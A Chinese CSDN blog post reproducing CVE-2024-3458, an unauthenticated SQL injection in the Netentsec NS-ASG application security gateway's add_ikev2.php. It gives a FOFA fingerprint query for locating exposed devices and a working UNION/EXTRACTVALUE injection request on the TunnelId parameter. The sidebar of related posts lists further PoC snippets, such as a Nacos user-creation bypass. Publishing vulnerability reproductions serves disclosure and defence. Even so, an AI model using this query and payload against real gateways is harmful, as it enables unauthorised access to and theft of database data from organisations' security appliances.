【漏洞复现】网康科技NS-ASG应用安全网关 add_ikev2.php SQL注入漏洞(CVE-2024-3458)

最新推荐文章于 2024-05-17 12:00:12 发布
最新推荐文章于 2024-05-17 12:00:12 发布
阅读量37 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 科技 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137915092
版权

0x01 产品简介

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和IPSec,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

0x02 漏洞概述

网康科技NS-ASG应用安全网关存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。

0x03 测绘语句

fofa: title="网康-NS-ASG-应用安全网关"

0x04 漏洞复现

GET /admin/add_ikev2.php?TunnelId=1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(1)),0x7e)) HTTP/1.1

0x05 影响范围

网康科技NS-ASG应用安全网关

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现网康NS-ASG应用安全网关 index.php SQL注入漏洞(CVE-2024-2330)
qq_67810151的博客
03-11 486
Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
07-12
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
漏洞复现网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
weixin_52204925的博客
03-07 737
网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
wan___she__pi的博客
03-26 617
网康科技NS-ASG 应用安全网关是一种网络设备,旨在保护企业的网络和应用免受各种网络威胁和攻击。它结合了防火墙、入侵检测和防御系统(IDS/IPS)、反病毒、反垃圾邮件、VPN(虚拟专用网络)等功能,提供全面的应用安全保护。网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,造成数据库信息泄露。
2021年网络安全设备漏洞集合
weixin_47536169的博客
07-13 3651
360天擎SQL注入漏洞 描述 fofa title="360新天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露 描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过 描述 fofa:title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..
漏洞复现网康科技NS-ASG应用安全网关 add_postlogin.php SQL注入漏洞(CVE-2024-3455)
qq_67810151的博客
04-18 148
网康科技NS-ASG应用安全网关存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
漏洞复现网康科技NS-ASG应用安全网关 config_ISCGroupNoCache.php SQL注入漏洞(CVE-2024-3457)
qq_67810151的博客
04-18 32
网康科技NS-ASG应用安全网关存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
漏洞复现网康科技NS-ASG应用安全网关 config_Anticrack.php SQL注入漏洞(CVE-2024-3456)
qq_67810151的博客
04-18 131
网康科技NS-ASG应用安全网关存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
02-AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南-v1.0.pdf
03-17
AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南 核心指导文档
HUAWEI_ASG2000_应用安全网关_V100R001C10SPC200_升级指导书.doc
09-30
HUAWEI_ASG2000_应用安全网关_V100R001C10SPC200_升级指导书.doc
terraform-aws-asg-dns-handler:Terraform模块,用于根据AWS Auto Scaling组中实例上的模式动态设置主机名
02-04
要求 0.12+ 2.0+用法创建一个ASG并设置asg:hostname_pattern标签,例如: asg-test-#instanceid.asg-handler-vpc.testing@Z3QP9GZSRL8IVA可以像这样在Terraform中插值: tag { key = " asg:hostname_pattern
terraform-aws-asg:Terraform AWS Auto Scaling堆栈
02-04
先决条件预先配置的AWS VPC要求Terraform 0.8.0或更高版本AWS提供商组模块组模块将提供安全组,启动配置和自动扩展组资源。 ELB和简单组配置均受支持。输入变量资源标签stack_item_fullname此堆栈项目的长格式描述性...
功能安全如何在公司顺利开展?-亚远景科技
yayuanjingkeji的博客
05-14 232
随着汽车技术的不断发展,汽车系统的复杂性和交互性大幅增加,功能安全成为确保驾驶员、乘客及行人安全的关键。本场功能安全线上会议,亚远景为汽车行业的相关人员准备了以下内容:1.功能安全简介及认证概念 2.为什么车辆行业需要进行功能安全开发 3.企业如何进行功能安全开发的实施 4.企业在功能安全开发遇见的常见问题
德人合科技 | 什么软件可以保护公司文件数据资料,防止泄露
最新发布
m0_74448820的博客
05-17 359
天锐绿盾是一款专为企业设计的电脑文件加密防泄密软件系统,它可以有效地帮助公司保护电脑文件的安全,确保商业机密不被泄露。
大模型时代下的先行者:景联文科技引领数据标注新时代
weixin_55551028的博客
05-15 418
针对客户的多样化需求,提供定制化数据标注解决方案,打破数据应用的界限,实施全面质量把控、验收流程,并开辟客户直接验收通道,灵活导出多样格式标注成果,保证项目的高标准、高效、高速完成。景联文科技已成功为全球范围内的数千家智能驾驶、智能安防、智慧医疗、智能教育、智慧金融、智能客服、新零售等行业的领先企业和高校科研机构提供海量且优质的AI训练数据,赋能人工智能未来。创新利用SAM算法驱动的标注平台,显著提升了标注效率,并积极探索自动标注技术,根据标注结果调整模型进行标注,提高数据标注精准度。
邦注科技 电解式超声波清洗机的原理介绍
wxbangzkj的博客
05-15 332
这些能量在清洗液中产生微小的气泡,这些气泡在液体中迅速形成和破裂,产生强烈的冲击力和涡流。同时,超声波的振动作用也使得模具表面的油污和锈迹更容易被清洗液溶解和去除。在电解过程中,电流如同魔法师的手指,轻轻一点,金属表面的污垢便在化学反应的魔力下逐渐脱落。此外,由于使用的清洗液通常是无机盐溶液,不含有机溶剂和有害物质,因此这种清洗方式对环境友好,同时也节约了能源和水资源。总的来说,电解式超声波去除模具表面油污锈迹的原理是通过电解作用分解和剥离污垢,同时结合超声波的冲击力和涡流效应进行彻底的清洗。
汇昌联信科技:拼多多电商的运营流程有哪些?
schcjkj的博客
05-14 268
拼多多平台的商品种类繁多,涵盖了服饰、家居、数码、食品等多个领域。商家在拼多多开店后,需要将商品信息上传至平台,包括商品图片、描述、价格等。在当今互联网高速发展的时代,电商平台层出不穷,其中拼多多以其独特的团购模式和低价策略迅速崛起,成为众多消费者和商家的新宠。同时,商家还需关注消费者的评价,及时回复消费者的咨询,提高服务质量。其中,拼团是拼多多的核心玩法,通过邀请好友一起购买,达到降低商品价格的目的。总之,拼多多电商的运营流程包括商品上架、营销推广、订单处理和售后服务四个环节。
搜维尔科技:Manus 手套, Prime II 一款全方位无线数据手套
souvr007的博客
05-15 354
搜维尔科技:Manus 手套, Prime II 一款全方位无线数据手套。手套, Prime II 一款全方位无线数据手套。
汇编代码_sub_3E99E3: .asmfunc .asg 0, var_0 .asg -2, var_2 .asg -5, var_5 .asg -6, var_6 .asg -7, var_7 .asg -8, var_8 .asg -9, var_9 .asg -0Ah, var_A .asg -0Bh, var_B .asg -0Ch, var_C .asg -0Dh, var_D .asg -0Eh, var_E .asg -0Fh, var_F .asg -10h, var_10 .asg -11h, var_11 .asg -12h, var_12 addb SP,#20转成C语言应该如何定义变量
07-08
short var_2; char var_5; char var_6; char var_7; char var_8; char var_9; char var_A; char var_B; char var_C; char var_D; char var_E; char var_F; char var_10; char var_11; char var_12; ``` 这里假设在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值